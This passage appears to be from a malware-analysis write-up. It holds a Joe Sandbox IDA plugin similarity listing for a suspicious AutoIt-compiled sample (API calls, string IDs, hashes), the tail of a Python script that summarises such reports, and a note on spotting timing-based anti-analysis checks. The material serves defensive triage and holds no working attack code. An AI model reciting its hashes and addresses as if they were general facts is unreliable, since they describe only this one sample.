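• Instruction Fuzzy Hash: A9E08631641211DBD7205FE19D0DBC67B7CBF44BA1F14C808F245C9080D7348542C754
APIs
  • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 009F4ED4
Strings
• Instruction Fuzzy Hash: F3918075A002089FCB14DF58C484EBABBF5BF49314F198099E90A9F3A2D735ED85CB91
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["entry"], ",".join(row["flags"]) or "-", " ".join(row["apis"]))
```

Run it against the text of a saved report to get one line per record with its first call-site address and labels; a record labelled `timing` is then checked in the disassembly at that address for whether the QueryPerformanceCounter delta feeds a threshold comparison and a branch (an anti-analysis check) or is simply the exit condition of a delay loop. The same `summarize` output also shows where a record has only runtime-library calls (LIBCMT, LIBVCRUNTIME), which is the bulk of this listing and can be skipped.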
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 009AE30D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorHandling__start
                        • String ID: pow
                        • API String ID: 3213639722-2276729525
                        • Opcode ID: 96bd70ad50a6fcf5e8a5e251302699c03d505fa3befbb8c2a2216ca6840685d2
                        • Instruction ID: 5c3161566742ce42b4ea67c3da362d22cbe78cd02c4e1c343cbad575c08c27a5
                        • Opcode Fuzzy Hash: 96bd70ad50a6fcf5e8a5e251302699c03d505fa3befbb8c2a2216ca6840685d2
                        • Instruction Fuzzy Hash: EE512F6190C10296CB15B798CB413F97B9CEFC17A0F344E68E4D5422F9EF358C969AC6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: #
                        • API String ID: 0-1885708031
                        • Opcode ID: 4e2ff85ab929049ee204687db15c55cf0d5ff54bd701005b3e9bce5aaf916cc7
                        • Instruction ID: e31717b9267ecf4e4ab73110a5794e72d839c1abfbc1587cfdd846132a646993
                        • Opcode Fuzzy Hash: 4e2ff85ab929049ee204687db15c55cf0d5ff54bd701005b3e9bce5aaf916cc7
                        • Instruction Fuzzy Hash: 3C510275944246DFDF15EF68C481AFE7BA8EF65310F24805AE8A19F3D0D6349D42CBA0
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 0099F2A2
                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0099F2BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: ce42e705e01dbf48a89a18c51042b866c78afb771cfb0ae07eaf1f616424170a
                        • Instruction ID: 854c7a7a6e503ade888036f241e6d409946d5fd47a6adf92bd8f6dba2f41dd8d
                        • Opcode Fuzzy Hash: ce42e705e01dbf48a89a18c51042b866c78afb771cfb0ae07eaf1f616424170a
                        • Instruction Fuzzy Hash: 755135714087449BE320EF50EC86BABBBF8FFC5304F91885DF29951295EB3085298B66
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00A057E0
                        • _wcslen.LIBCMT ref: 00A057EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: BuffCharUpper_wcslen
                        • String ID: CALLARGARRAY
                        • API String ID: 157775604-1150593374
                        • Opcode ID: bfa9e8ec6dd4292dee82800265494d59fba1ad1b56c6150c1b1bf997296662ce
                        • Instruction ID: 34f4c9b2e2bd63e2ca29f47bec80877b191187afe47e8c271094cb495f37b877
                        • Opcode Fuzzy Hash: bfa9e8ec6dd4292dee82800265494d59fba1ad1b56c6150c1b1bf997296662ce
                        • Instruction Fuzzy Hash: 6B419F31E002099FCB04DFB9D8819BEBBB5EF99320F148069E905A7291E7309D85DF90
                        APIs
                        • _wcslen.LIBCMT ref: 009FD130
                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009FD13A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CrackInternet_wcslen
                        • String ID: |
                        • API String ID: 596671847-2343686810
                        • Opcode ID: d144ad7c2e4a7e7571c1a20436125a829738618730a733bc9de992ce9d916c87
                        • Instruction ID: dca30546a671dffd4f758a1836ea74c7d21eb217e167a63187984ec19363ff21
                        • Opcode Fuzzy Hash: d144ad7c2e4a7e7571c1a20436125a829738618730a733bc9de992ce9d916c87
                        • Instruction Fuzzy Hash: 30313E71D01209ABCF15EFA4CC85BEEBFBAFF45300F100019F915AA262D735AA16DB60
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 00A13621
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A1365C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: 4edb1f9032a30c0e15d47d876e9d4295938d41098c7855c49a9b1f8ab3e9d6ea
                        • Instruction ID: 5c3dc9922f4cf7069d0f3f2a7f6be7e410f67e4e94f26c442fa293d8665f18f9
                        • Opcode Fuzzy Hash: 4edb1f9032a30c0e15d47d876e9d4295938d41098c7855c49a9b1f8ab3e9d6ea
                        • Instruction Fuzzy Hash: CF318B72100204AEEB20DF68DC80FFB73A9FF88764F109619F9A5D7280DA34AD91C760
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A1461F
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A14634
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: 676c4212778e91a7b50c0cd6d434253573234cf6c95506a8c9e75ce641c39979
                        • Instruction ID: 713e75bd741dcaa68077471e73d1ad026711bd51f5a46315b95aec533a769edb
                        • Opcode Fuzzy Hash: 676c4212778e91a7b50c0cd6d434253573234cf6c95506a8c9e75ce641c39979
                        • Instruction Fuzzy Hash: 5D313974A0030A9FDF14CFA9C980BEA7BB6FF49314F14406AE914AB341E770A981CF90
                        APIs
                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A1327C
                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A13287
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: Combobox
                        • API String ID: 3850602802-2096851135
                        • Opcode ID: 9f6ddc93ce1095729bfe6abe9496092d36deafa73576195e26b7ea893d19180a
                        • Instruction ID: 12a7bf44476d6009eea08d5cf31a3ea9026c1eb687e8d9f789410b8a65f5450b
                        • Opcode Fuzzy Hash: 9f6ddc93ce1095729bfe6abe9496092d36deafa73576195e26b7ea893d19180a
                        • Instruction Fuzzy Hash: B311B2723002087FEF21AF94DC81EFB376BEBA8364F104224F91897290D6759D918760
                        APIs
                          • Part of subcall function 0098600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
                          • Part of subcall function 0098600E: GetStockObject.GDI32(00000011), ref: 00986060
                          • Part of subcall function 0098600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A
                        • GetWindowRect.USER32(00000000,?), ref: 00A1377A
                        • GetSysColor.USER32(00000012), ref: 00A13794
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                        • String ID: static
                        • API String ID: 1983116058-2160076837
                        • Opcode ID: 7d539e73a6af233f88a44c9167b75b427ae77fcc131588b27203ecc729b85ba0
                        • Instruction ID: 497055a0972846b0a0ab5dbf46a0984ce57e5f1efed9d4b417fefc03616da5d1
                        • Opcode Fuzzy Hash: 7d539e73a6af233f88a44c9167b75b427ae77fcc131588b27203ecc729b85ba0
                        • Instruction Fuzzy Hash: 561137B2650209AFDF01DFA8CC46EFA7BB9FB08314F004914F956E3250E735E8519B60
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009FCD7D
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009FCDA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: 057ec3b8073849f731d6b4b0a208deb20beadf58560fde38f88286f6ee313746
                        • Instruction ID: 9d54fcc444e37f216cab22bd51c3fc00645af49f46961c06e89a7bc60d46388d
                        • Opcode Fuzzy Hash: 057ec3b8073849f731d6b4b0a208deb20beadf58560fde38f88286f6ee313746
                        • Instruction Fuzzy Hash: 7A11A3B524563DBAD7244A668C45EFBBEADEF127B4F008626B219920C0D6749841D7F0
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 00A134AB
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A134BA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 31f0719081022c01010433ec4ae8c57c9caae3452325f1e27e171e7918b0996f
                        • Instruction ID: 6cb7b416d82ca2fbc3d78acd288e5bc75a6d0053759e0e4cbca89968dbf1c57a
                        • Opcode Fuzzy Hash: 31f0719081022c01010433ec4ae8c57c9caae3452325f1e27e171e7918b0996f
                        • Instruction Fuzzy Hash: C211BC72100208AFEF228FA4DC80AFB37AAEB14375F504324FA61931E0C735DC919B60
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                        • CharUpperBuffW.USER32(?,?,?), ref: 009E6CB6
                        • _wcslen.LIBCMT ref: 009E6CC2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: STOP
                        • API String ID: 1256254125-2411985666
                        • Opcode ID: 946602ac946db867b2eb9aab9a792f9fd85efbba3fa5b306b81eb30fb4dd7b84
                        • Instruction ID: 5141165263fd9d9cbdb1a0adc4ed5c898c555f6d03d0cf5778f137270389eaed
                        • Opcode Fuzzy Hash: 946602ac946db867b2eb9aab9a792f9fd85efbba3fa5b306b81eb30fb4dd7b84
                        • Instruction Fuzzy Hash: 4C0108326005668BCB12AFBECC409BF73A9FBB17907500924E59296191EB35DD40C750
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009E1D4C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 13696900de4357e6183eff7d274a3bb0ca4074fe5cd77c4c3c0960b2f197b165
                        • Instruction ID: 559968b71f1478cbc44710542eb9387b000dcde406864c5cb912d05a07cc53bd
                        • Opcode Fuzzy Hash: 13696900de4357e6183eff7d274a3bb0ca4074fe5cd77c4c3c0960b2f197b165
                        • Instruction Fuzzy Hash: 08014C35601218ABCB09FBA0CC15DFE73A8FF82350B144909F873673C1EA355D488760
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 009E1C46
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 7aacff71a038eb6fb16d59b0b8c05e97fac6fe9d416232b36e842a8e169e5d3c
                        • Instruction ID: fa9e37dabf3401637e5912fc88b9e285e3ea2d571e89f712f7e146dfd4786f03
                        • Opcode Fuzzy Hash: 7aacff71a038eb6fb16d59b0b8c05e97fac6fe9d416232b36e842a8e169e5d3c
                        • Instruction Fuzzy Hash: C401A775B811446BCB05FBA1C956AFF77AC9B91340F240419B896B7282EA35DE0887B1
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 009E1CC8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: 568958d1cbba6def9e44f3c83d0719d1f60de93cd65d49000d08bad516753ab5
                        • Instruction ID: e5de1a36ea898e03625c84afe2964dedcc3ce1c842e008f8ed43f63c861c200f
                        • Opcode Fuzzy Hash: 568958d1cbba6def9e44f3c83d0719d1f60de93cd65d49000d08bad516753ab5
                        • Instruction Fuzzy Hash: 2501D675A8115867CB06FBA1CA05BFE73ACAB51340F244415B886B3282FA359F09C771
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 009E1DD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: fcc6ad2686ec9aeb2872207d3e7cdab3a15352145755b4e2e52bce1bb5f21dcd
                        • Instruction ID: c74acdc6b179fb066734a75a9677ee1fbdccf5b3e5afcbcb56d0de82e07bf040
                        • Opcode Fuzzy Hash: fcc6ad2686ec9aeb2872207d3e7cdab3a15352145755b4e2e52bce1bb5f21dcd
                        • Instruction Fuzzy Hash: 13F0FF71A412186BCB05F7A5CC56BFE73ACAB82350F080D19B862632C2EA759E088360
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: 3, 3, 16, 1
                        • API String ID: 176396367-3042988571
                        • Opcode ID: da22ab3f3bcbc2c1f107a8556166e2c2d92ba3c33675a181932deded0f5ffb91
                        • Instruction ID: e6ebf7f3f18c8586d9e101c708f2ea7bd6c6b8fbfd3f707f97e23efb7ee615a6
                        • Opcode Fuzzy Hash: da22ab3f3bcbc2c1f107a8556166e2c2d92ba3c33675a181932deded0f5ffb91
                        • Instruction Fuzzy Hash: 3DE02B06A0426020D2311779BCC1A7F968DDFC6B90710182BF981C62A6EAE59DA193E1
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009E0B23
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Message
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 2030045667-4017498283
                        • Opcode ID: d4e3cf9945011ed5b225d462803c810e8dc7f7f17b80697e59d9e7e298577be6
                        • Instruction ID: 413addb2a7eb41789ccd7191bedac04940ff64777cc97fb06feae53a7b8a3071
                        • Opcode Fuzzy Hash: d4e3cf9945011ed5b225d462803c810e8dc7f7f17b80697e59d9e7e298577be6
                        • Instruction Fuzzy Hash: ECE0483528431837D61436957C03FC9BA899F46F61F204426F798955C38BD268D046E9
                        APIs
                          • Part of subcall function 0099F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009A0D71,?,?,?,0098100A), ref: 0099F7CE
                        • IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009A0D75
                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009A0D84
                        Strings
                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009A0D7F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                        • API String ID: 55579361-631824599
